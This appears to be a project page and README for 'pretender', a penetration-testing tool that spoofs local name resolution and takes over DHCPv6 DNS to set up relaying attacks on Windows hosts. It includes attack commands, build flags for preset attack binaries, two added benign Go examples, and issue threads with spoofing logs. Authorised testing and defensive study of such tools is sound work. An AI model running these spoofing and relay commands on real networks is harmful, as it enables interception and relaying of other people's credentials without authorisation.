Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS, LLMNR and NetBIOS-NS spoofing.

  • By RedTeam Pentesting GmbH
  • Last update: Jan 1, 2023
  • Comments: 3

pretender




pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks, but it can be deployed on Linux, Windows and all other platforms Go supports. It can also answer with arbitrary IPs for situations where the relaying tool runs on a different host than pretender.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disables DHCPv6, DNS and router advertisements), --no-lnr (disables mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be set up to only respond to queries for certain domains (or all but certain domains), and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain an FQDN option (which can sometimes contain a hostname that is not an FQDN). This option is used to filter messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without an FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor.
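The vendor-list format from the last tip, parsed and queried in Go as an added example. This is illustration code written for this page, not pretender's hostinfo package: the VendorEntry type, the function names and the sample list are constructed, and the only behaviour taken from the README is that a line is recognized only when it has the three tab-separated columns FF:FF:FF, VendorID and Vendor.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net"
	"strings"
)

// VendorEntry is one recognized line of the mac-vendors.txt format
// described above: FF:FF:FF<tab>VendorID<tab>Vendor.
type VendorEntry struct {
	Prefix   string // three-octet prefix, normalized to upper case, e.g. "00:50:56"
	VendorID string
	Vendor   string
}

// ParseMACVendorList reads the list and keeps only lines that have exactly
// three tab-separated columns and a well-formed three-octet prefix; comments,
// blank lines and anything else are skipped rather than aborting the load.
// Hypothetical helper written for this example, not pretender's own loader.
func ParseMACVendorList(r io.Reader) (map[string]VendorEntry, error) {
	entries := make(map[string]VendorEntry)
	sc := bufio.NewScanner(r)
	for sc.Scan() {
		line := strings.TrimRight(sc.Text(), "\r\n ")
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		fields := strings.Split(line, "\t")
		if len(fields) != 3 {
			continue
		}
		prefix := strings.ToUpper(strings.TrimSpace(fields[0]))
		if !validOUI(prefix) {
			continue
		}
		entries[prefix] = VendorEntry{
			Prefix:   prefix,
			VendorID: strings.TrimSpace(fields[1]),
			Vendor:   strings.TrimSpace(fields[2]),
		}
	}
	return entries, sc.Err()
}

// validOUI accepts exactly "XX:XX:XX" with upper-case hex octets.
func validOUI(p string) bool {
	parts := strings.Split(p, ":")
	if len(parts) != 3 {
		return false
	}
	for _, octet := range parts {
		if len(octet) != 2 || strings.Trim(octet, "0123456789ABCDEF") != "" {
			return false
		}
	}
	return true
}

// LookupVendor maps a MAC address in any form net.ParseMAC accepts to its
// vendor entry; malformed addresses and unknown prefixes report ok == false.
func LookupVendor(entries map[string]VendorEntry, mac string) (VendorEntry, bool) {
	hw, err := net.ParseMAC(mac)
	if err != nil || len(hw) < 3 {
		return VendorEntry{}, false
	}
	prefix := strings.ToUpper(fmt.Sprintf("%02x:%02x:%02x", hw[0], hw[1], hw[2]))
	e, ok := entries[prefix]
	return e, ok
}

// Constructed sample list: two valid lines, a comment, a line with a
// too-short prefix and a line with a fourth column; only two are recognized.
const sampleVendorList = "# constructed sample, not the real hostinfo/mac-vendors.txt\n" +
	"00:50:56\tVMWARE\tVMware, Inc.\n" +
	"b8:27:eb\tRPI\tRaspberry Pi Foundation\n" +
	"00:50\tBAD\ttoo short\n" +
	"00:0C:29\tVMWARE\tVMware, Inc.\textra column\n"

func main() {
	entries, err := ParseMACVendorList(strings.NewReader(sampleVendorList))
	if err != nil {
		panic(err)
	}
	for _, mac := range []string{"00:50:56:ab:cd:ef", "B8-27-EB-00-11-22", "de:ad:be:ef:00:01"} {
		if e, ok := LookupVendor(entries, mac); ok {
			fmt.Printf("%s -> %s (%s)\n", mac, e.Vendor, e.VendorID)
		} else {
			fmt.Printf("%s -> unknown vendor\n", mac)
		}
	}
}
```

Skipping unrecognized lines instead of failing keeps a hand-edited list usable; if you replace the compiled-in list, run it through a loader like this once to see which lines would be silently dropped.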

Building and Vendoring

Pretender can be built as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces
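How the -X vendoring mechanism above works, as an added Go example that is not pretender's defaults.go: the Go linker can only set package-level string variables with -X, so every compiled-in option arrives as a string and has to be parsed at startup. The variable names follow the list above, but the Config type, the vendorDefaults function and the assumption that vendorStopAfter is a Go duration string (e.g. "30m") are constructed for this example.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
	"time"
)

// The Go linker's -X flag can only set package-level string variables that are
// uninitialized or initialized to a constant string, which is why every
// vendoring option is a string and must be parsed at startup. The names below
// mirror the naming scheme of the list above but are declared here for the
// example; this is not pretender's defaults.go.
var (
	vendorInterface string
	vendorNoColor   string
	vendorStopAfter string
	vendorSpoofFor  string
)

// Config holds the typed startup defaults derived from the vendored strings.
type Config struct {
	Interface string
	NoColor   bool
	StopAfter time.Duration // zero means "never stop" (assumed format: Go duration)
	SpoofFor  []string
}

// vendorDefaults converts the compiled-in strings into typed values. A value
// that does not parse is reported instead of being silently dropped, so a
// typo in the build command is caught at the first start of the binary.
func vendorDefaults() (Config, error) {
	cfg := Config{Interface: vendorInterface}

	if vendorNoColor != "" {
		b, err := strconv.ParseBool(vendorNoColor)
		if err != nil {
			return Config{}, fmt.Errorf("vendorNoColor %q: %w", vendorNoColor, err)
		}
		cfg.NoColor = b
	}

	if vendorStopAfter != "" {
		d, err := time.ParseDuration(vendorStopAfter)
		if err != nil {
			return Config{}, fmt.Errorf("vendorStopAfter %q: %w", vendorStopAfter, err)
		}
		cfg.StopAfter = d
	}

	// Host lists use the same comma-separated form as --spoof-for on the CLI.
	for _, h := range strings.Split(vendorSpoofFor, ",") {
		if h = strings.TrimSpace(h); h != "" {
			cfg.SpoofFor = append(cfg.SpoofFor, h)
		}
	}

	return cfg, nil
}

func main() {
	// Build with, for example:
	//   go build -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorStopAfter=30m'
	cfg, err := vendorDefaults()
	if err != nil {
		fmt.Println("invalid vendored default:", err)
		return
	}
	fmt.Printf("%+v\n", cfg)
}
```

Without any -ldflags the variables stay empty and the function returns the zero Config, which is exactly the fallback a CLI flag parser would then override; with a misspelled value such as vendorNoColor=yes the binary reports the problem on its first start rather than quietly running with colour enabled.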


Comments (3)

  • 1

    Handle SOA queries and dynamic updates for Kerberos relaying

    This PR implements the necessary changes to support Kerberos relaying together with krbrelayx. However, we should add some tests before merging. Closes #1.

  • 2

    Respond to SOA queries and dynamic updates for Kerberos relaying

    Pretender should respond to SOA queries and dynamic updates to support the Kerberos relaying attack outlined in https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/.

  • 3

    Filtering with --spoof-for

    Hi, first of all thanks for this great tool :D

    I have a feature request regarding filtering with --spoof-for.

    Following example:

    # pretender --verbose --interface ens18 --no-lnr --spoof-for 192.168.2.2
    Pretender by RedTeam Pentesting built from git commit 69d85ac239
    Listening on interface: ens18
    IPv4 relayed to: 192.168.2.12
    IPv6 relayed to: fe80::8f6:4eff:fef4:f415
    Answering queries from: 192.168.2.2
    
    23:44:35 [DNS] listening via TCP on [fe80::8f6:4eff:fef4:f415%ens18]:53
    23:44:35 [DNS] listening via UDP on [fe80::8f6:4eff:fef4:f415%ens18]:53
    23:44:35 [DHCPv6] listening via UDP on [ff02::1:2%ens18]:547
    23:44:36 [RA] sending router advertisement on ens18
    23:44:51 [DHCPv6] ignoring DHCP SOLICIT request from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2): host not in spoof-for list
    

    I think pretender should answer the DHCPv6 request, because it knows that fe80::d09b:746d:4510:5d8c belongs to the allowed address 192.168.2.2. Otherwise allowing only specific IPs is quite cumbersome because you have to know the IPv6 address beforehand.

    Another case is this:

    # pretender --verbose --interface ens18 --no-lnr --spoof-for win2016.arasaka.local
    Pretender by RedTeam Pentesting built from git commit 69d85ac239
    Listening on interface: ens18
    IPv4 relayed to: 192.168.2.12
    IPv6 relayed to: fe80::8f6:4eff:fef4:f415
    Answering queries from: win2016.arasaka.local (192.168.2.2)
    
    23:39:10 [DHCPv6] listening via UDP on [ff02::1:2%ens18]:547
    23:39:10 [DNS] listening via TCP on [fe80::8f6:4eff:fef4:f415%ens18]:53
    23:39:10 [DNS] listening via UDP on [fe80::8f6:4eff:fef4:f415%ens18]:53
    23:39:11 [RA] sending router advertisement on ens18
    23:39:38 [DHCPv6] responding to SOLICIT from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2) by assigning IPv6 "fe80::8000:c66d:7e7b:5e75"
    23:39:39 [DHCPv6] responding to REQUEST from fe80::d09b:746d:4510:5d8c (win2016.arasaka.local, 192.168.2.2) by assigning DNS server and IPv6 "fe80::8000:c66d:7e7b:5e75"
    23:39:39 [DNS] ignoring query for "win2016.arasaka.local" (SOA) from fe80::8000:c66d:7e7b:5e75 (192.168.2.2): host address and name not in spoof-for list
    

    Here it would be nice if the query from fe80::8000:c66d:7e7b:5e75 (192.168.2.2) would be answered, because pretender knows that fe80::8000:c66d:7e7b:5e75 belongs to 192.168.2.2 which in turn belongs to win2016.arasaka.local.